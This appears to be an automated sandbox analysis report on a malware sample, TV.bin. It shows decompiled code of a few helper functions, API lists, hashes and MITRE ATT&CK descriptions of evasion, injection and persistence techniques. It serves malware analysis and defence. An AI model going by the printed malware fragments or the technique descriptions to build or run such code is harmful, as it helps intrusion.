Instruction ID: 9f967016c288655b5df09fd6f419578660ef6ad1fd0947e0e8c988259c62b912
Opcode Fuzzy Hash: 11306c0213ff53abd55861bdd59dab88ef31960ddb0e14712086c74cd72d7f93
Instruction Fuzzy Hash: 69F01930B40B27A7EA9497EE8EA9F5A36F89B4AB05F010410BA15D7685E560E401CA64

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA8100, Relevance: 6.1, APIs: 4, Instructions: 94
stringCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E6ECA8100(intOrPtr _a4, struct HWND__* _a8, signed int _a12, signed int _a16, signed int _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				short _v568;
				signed int _t16;
				struct HWND__* _t20;
				signed int _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				WCHAR* _t37;
				int _t40;
				struct HWND__* _t52;

				_t32 = _a16;
				if((_t32 & 0x40000000) == 0 || _t32 < 0) {
					_t16 = 1;
					_t32 = _t32 & 0xefffffff;
					_t36 = 0x8000080;
				} else {
					_t36 = _a4;
					_t16 = 0;
				}
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(0);
				_push( ~_a32);
				asm("sbb eax, eax");
				_push( ~_a28);
				_push(_t32);
				_push( !( ~_t16) & _a12);
				_t20 = _a8;
				_push(_t20);
				_push(_t36);
				M6ECB05F0();
				_t52 = _t20;
				_t40 = GetClassNameW(_t52,  &_v568, 0x103);
				if(_t40 <= 0) {
					L10:
					return _t52;
				} else {
					_t37 = M6ECB0560; // 0x0
					if(lstrcmpiW( &_v568, _t37) != 0) {
						if(_t40 > 1) {
							_t34 = M6ECB0558; // 0x0
							if(lstrcmpiW( &_v568, _t34 + 2) == 0) {
								_push(4);
								_push(_t52);
								 *0x6ecb039c = _t52;
								M6ECB05B8();
								_push(0x1a);
								_push(1);
								_push(1);
								_push(0);
								_push(0);
								_push(0);
								_push(_t52);
								M6ECB05C4();
							}
						}
						goto L10;
					} else {
						DestroyWindow(_t52);
						return 0;
					}
				}
			}

0x6eca8100
0x6eca8110
0x6eca81c6
0x6eca81cb
0x6eca81d1
0x6eca811e
0x6eca811e
0x6eca8125
0x6eca8125
0x6eca8131
0x6eca8139
0x6eca8141
0x6eca8149
0x6eca8151
0x6eca8153
0x6eca8157
0x6eca8163
0x6eca8165
0x6eca816f
0x6eca8170
0x6eca8171
0x6eca8178
0x6eca8179
0x6eca817a
0x6eca8189
0x6eca8193
0x6eca8197
0x6eca8217
0x6eca8222
0x6eca8199
0x6eca8199
0x6eca81af
0x6eca81de
0x6eca81e0
0x6eca81f3
0x6eca81f5
0x6eca81f7
0x6eca81f8
0x6eca81fe
0x6eca8204
0x6eca8206
0x6eca8208
0x6eca820a
0x6eca820c
0x6eca820e
0x6eca8210
0x6eca8211
0x6eca8211
0x6eca81f3
0x00000000
0x6eca81b1
0x6eca81b2
0x6eca81c3
0x6eca81c3
0x6eca81af

APIs

GetClassNameW.USER32 ref: 6ECA818D
lstrcmpiW.KERNEL32(00000000,00000000), ref: 6ECA81AB
DestroyWindow.USER32(00000000), ref: 6ECA81B2
lstrcmpiW.KERNEL32(-00000002,-00000002), ref: 6ECA81EF

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$ClassDestroyNameWindow
String ID:
API String ID: 2342604607-0
Opcode ID: 7bbe1cb65fba7926be6536f82387c1f063d539e6202fe20fd83eb674d8db4616
Instruction ID: 4a3af59787786010fae07021443cc4b0e4dd327b5282728ec5a5a68f92147aea
Opcode Fuzzy Hash: 7bbe1cb65fba7926be6536f82387c1f063d539e6202fe20fd83eb674d8db4616
Instruction Fuzzy Hash: 7131B633255752ABE7209A9CCE49FEF73B8EF89710F140919FB55D3180E674A8048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAA230, Relevance: 6.1, APIs: 4, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAA230() {
				int _v4;
				char _v7;
				char _v8;
				intOrPtr* _t15;
				char _t18;
				int _t23;
				signed int _t29;
				void* _t32;

				if(GetCommandLineA() == 0) {
					L20:
					ExitProcess(0);
				}
				_v4 = 0;
				_t32 = E6ECAA3D0(_t12,  &_v4);
				if(_t32 == 0) {
					L19:
					goto L20;
				}
				_t23 = _v4;
				if(_t23 <= 2) {
					L18:
					LocalFree(_t32);
					goto L19;
				}
				_t29 = 2;
				if(_t23 <= 2) {
					L17:
					goto L18;
				}
				do {
					_t15 =  *((intOrPtr*)(_t32 + _t29 * 4));
					if( *((char*)(_t15 + 1)) != 0) {
						goto L10;
					}
					_v8 =  *_t15;
					_v7 = 0;
					CharLowerA( &_v8);
					_t18 = _v8;
					if(_t18 == 0x66) {
						E6ECAA130(1);
						L15:
						L16:
						goto L17;
					}
					if(_t18 == 0x65) {
						E6ECAA130(0);
						goto L15;
					}
					if(_t18 == 0x75) {
						E6ECA9BD0(1);
						goto L15;
					}
					_t23 = _v4;
					L10:
					_t29 = _t29 + 1;
				} while (_t29 < _t23);
				goto L16;
			}

0x6ecaa23b
0x6ecaa2dd
0x6ecaa2df
0x6ecaa2df
0x6ecaa248
0x6ecaa255
0x6ecaa25c
0x6ecaa2dc
0x00000000
0x6ecaa2dc
0x6ecaa25e
0x6ecaa265
0x6ecaa2d5
0x6ecaa2d6
0x00000000
0x6ecaa2d6
0x6ecaa268
0x6ecaa26f
0x6ecaa2d4
0x00000000
0x6ecaa2d4
0x6ecaa280
0x6ecaa280
0x6ecaa288
0x00000000
0x00000000
0x6ecaa291
0x6ecaa295
0x6ecaa29a
0x6ecaa29c
0x6ecaa2a2
0x6ecaa2b9
0x6ecaa2d0
0x6ecaa2d3
0x00000000
0x6ecaa2d3
0x6ecaa2a6
0x6ecaa2c2
0x00000000
0x6ecaa2c2
0x6ecaa2aa
0x6ecaa2cb
0x00000000
0x6ecaa2cb
0x6ecaa2ac
0x6ecaa2b0
0x6ecaa2b0
0x6ecaa2b1
0x00000000

APIs

GetCommandLineA.KERNEL32 ref: 6ECAA233
ExitProcess.KERNEL32 ref: 6ECAA2DF

Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4

CharLowerA.USER32(?,?,?,?,?,?), ref: 6ECAA29A
LocalFree.KERNEL32(00000000,?), ref: 6ECAA2D6

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Local$AllocCharCommandExitFreeLineLowerProcesslstrlen
String ID:
API String ID: 4176052798-0
Opcode ID: 6a993545ecdb95567ab309e0afc5c67f71fbb918f40baa940b38d8da146a9427
Instruction ID: fe19446dc9ad10276170a9c9f32967175bc7d27654c25404a52d5e0125e48af1
Opcode Fuzzy Hash: 6a993545ecdb95567ab309e0afc5c67f71fbb918f40baa940b38d8da146a9427
Instruction Fuzzy Hash: 4A11E72004C247AFD3809ADD98547DE7BAB6FC2319F040919F79E82186F7A2945587A3

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAA2F0, Relevance: 6.0, APIs: 4, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6ECAA2F0(short* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t11;
				char* _t12;
				int _t13;
				int _t17;
				short* _t18;

				_t18 = _a4;
				_t12 = 0;
				asm("sbb esi, esi");
				_t17 =  ~_a8 & 0x0000fde9;
				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
				if(_t13 > 0) {
					_t3 = _t13 + 1; // 0x1
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
					_t11 = _a12;
					if(_t11 != 0) {
						 *_t11 = _t13 - 1;
					}
				}
				return _t12;
			}

0x6ecaa2f2
0x6ecaa2fc
0x6ecaa307
0x6ecaa30a
0x6ecaa317
0x6ecaa31b
0x6ecaa31d
0x6ecaa335
0x6ecaa33e
0x6ecaa344
0x6ecaa34a
0x6ecaa34d
0x6ecaa34d
0x6ecaa34a
0x6ecaa355

APIs

WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA311
GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0), ref: 6ECAA323
HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0,0000009C), ref: 6ECAA32A
WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA33E

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharHeapMultiWide$AllocProcess
String ID:
API String ID: 1432973188-0
Opcode ID: 37054ca9e507f1390ec5f818c3ae98b175fc060b6c5b86b6135426f6ef7f237a
Instruction ID: b44ecff268932a32a7cdf9f1c3c30019f990f99e40fe0416346341a89927c484
Opcode Fuzzy Hash: 37054ca9e507f1390ec5f818c3ae98b175fc060b6c5b86b6135426f6ef7f237a
Instruction Fuzzy Hash: 66F049B62057197FE6004A5D8D84F6B77ACEBC57B9F110225FA25D31C0D660EC054671

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAA360, Relevance: 5.0, APIs: 4, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6ECAA360(char* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t12;
				short* _t13;
				int _t14;
				int _t18;
				char* _t19;

				_t19 = _a4;
				_t13 = 0;
				asm("sbb esi, esi");
				_t18 =  ~_a8 & 0x0000fde9;
				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0);
				if(_t14 > 0) {
					_t4 = _t14 + 2; // 0x2
					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4);
					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
					_t12 = _a12;
					if(_t12 != 0) {
						 *_t12 = _t14 - 1;
					}
				}
				return _t13;
			}

0x6ecaa362
0x6ecaa36c
0x6ecaa375
0x6ecaa378
0x6ecaa385
0x6ecaa389
0x6ecaa38b
0x6ecaa3a0
0x6ecaa3a9
0x6ecaa3af
0x6ecaa3b5
0x6ecaa3b8
0x6ecaa3b8
0x6ecaa3b5
0x6ecaa3c0

APIs

MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,76D26900,6ECA39D7,?,00000000,00000000), ref: 6ECAA37F
GetProcessHeap.KERNEL32(00000008,00000002), ref: 6ECAA392
HeapAlloc.KERNEL32(00000000), ref: 6ECAA399
MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000), ref: 6ECAA3A9

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharHeapMultiWide$AllocProcess
String ID:
API String ID: 1432973188-0
Opcode ID: f2c2abff3a5340a25382658f1201e3642191afe98bab74492e34229e8926ccd0
Instruction ID: e95c80edda0b759dc4683c8214f002fc1cb47ab628135198596c28bbdf983da2
Opcode Fuzzy Hash: f2c2abff3a5340a25382658f1201e3642191afe98bab74492e34229e8926ccd0
Instruction Fuzzy Hash: 77F09CB6201A157FD7004A9D8D84D6BBBADEBC6779F110325FE25D32C0D660EC058A71

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report TV.bin

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6240 Parent PID: 2832

General

Function 6ECA8510, Relevance: 225.2, APIs: 113, Strings: 15, Instructions: 1164
memorythreadCOMMON

Function 6ECA3B60, Relevance: 12.1, APIs: 8, Instructions: 67
memoryregistrythreadCOMMON

Function 6ECA3280, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 89
COMMON

Function 6ECA6D50, Relevance: 125.0, APIs: 65, Strings: 6, Instructions: 765
memorytimewindowCOMMON

Function 6ECA5B40, Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 721
memorysleepstringCOMMON

Function 6ECA3C60, Relevance: 98.4, APIs: 40, Strings: 16, Instructions: 398
registrystringserviceCOMMON

Function 6ECA96D0, Relevance: 77.3, APIs: 38, Strings: 6, Instructions: 346
memorysleeplibraryCOMMON

Function 6ECA2ED0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 227
memoryfileprocessCOMMON

Function 6ECA44D0, Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 202
memoryCOMMON

Function 6ECA23B0, Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 164
librarythreadstringCOMMON

Function 6ECA66E0, Relevance: 34.7, APIs: 23, Instructions: 239
windowCOMMON

Function 6ECA2750, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 115
memorynativethreadCOMMON

Function 6ECA28B0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84
filestringCOMMON

Function 6ECA3610, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80
sleepprocessCOMMON

Function 6ECA2DF0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
fileCOMMON

Function 6ECAB0A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106
memorynativethreadCOMMON

Function 6ECA4EF0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81
processnativesynchronizationCOMMON

Function 6ECA9BD0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40
threadsleepsynchronizationCOMMON

Function 6ECA3700, Relevance: 15.1, APIs: 10, Instructions: 76
servicesleepCOMMON

Function 6ECA37D0, Relevance: 13.6, APIs: 9, Instructions: 80
memoryserviceCOMMON

Function 6ECA2640, Relevance: 12.1, APIs: 8, Instructions: 98
nativeCOMMON

Function 6ECA7790, Relevance: 12.1, APIs: 8, Instructions: 86
threadwindownativeCOMMON

Function 6ECA5A00, Relevance: 12.1, APIs: 8, Instructions: 81
networkfileCOMMON

Function 6ECA4E50, Relevance: 12.1, APIs: 8, Instructions: 63
memoryCOMMON

Function 6ECA19F0, Relevance: 9.1, APIs: 6, Instructions: 143
memoryCOMMON

Function 6ECA8400, Relevance: 9.1, APIs: 6, Instructions: 90
nativeCOMMON

Function 6ECA6480, Relevance: 7.7, APIs: 5, Instructions: 205
comCOMMON

Function 6ECA1C00, Relevance: 6.1, APIs: 4, Instructions: 69
memorynativeCOMMON

Function 6ECAB270, Relevance: 4.5, APIs: 3, Instructions: 37
nativememorythreadCOMMON

Function 6ECA3220, Relevance: 4.5, APIs: 3, Instructions: 35
memoryCOMMON

Function 6ECA5130, Relevance: 4.5, APIs: 3, Instructions: 33
COMMON

Function 6ECA14E0, Relevance: 3.1, APIs: 2, Instructions: 88
memorynativeCOMMON

Function 6ECAB2D0, Relevance: 3.1, APIs: 2, Instructions: 81
nativeCOMMON

Function 6ECAAFC0, Relevance: 3.1, APIs: 2, Instructions: 71
nativethreadCOMMON

Function 6ECAB1F0, Relevance: 3.0, APIs: 2, Instructions: 42
nativethreadCOMMON

Function 6ECAAD39, Relevance: 1.6, APIs: 1, Instructions: 105
nativeCOMMON

Function 6ECA18D0, Relevance: 1.6, APIs: 1, Instructions: 56
nativeCOMMON

Function 6ECAAE20, Relevance: 1.5, APIs: 1, Instructions: 31
nativethreadCOMMON

Function 6ECAADE0, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 6ECAA500, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 6ECA9D10, Relevance: 86.1, APIs: 43, Strings: 6, Instructions: 310
memorywindowsleepCOMMON

Function 6ECA5690, Relevance: 72.0, APIs: 33, Strings: 8, Instructions: 281
networkmemorysleepCOMMON

Function 6ECA56B3, Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 258
networkmemorysleepCOMMON

Function 6ECA29D0, Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 330
memorycomstringCOMMON

Function 6ECA78B0, Relevance: 52.7, APIs: 25, Strings: 5, Instructions: 223
sleepstringthreadCOMMON

Function 6ECA6A90, Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 224
memoryCOMMON

Function 6ECA4CA0, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 150
memoryregistrystringCOMMON

Function 6ECA52B0, Relevance: 33.3, APIs: 12, Strings: 7, Instructions: 97
memorysleepCOMMON

Function 6ECA1100, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142
memoryfileCOMMON

Function 6ECA7F10, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 125
memoryCOMMON

Function 6ECA3930, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 102
memorystringCOMMON

Function 6ECA4130, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 75
registryCOMMON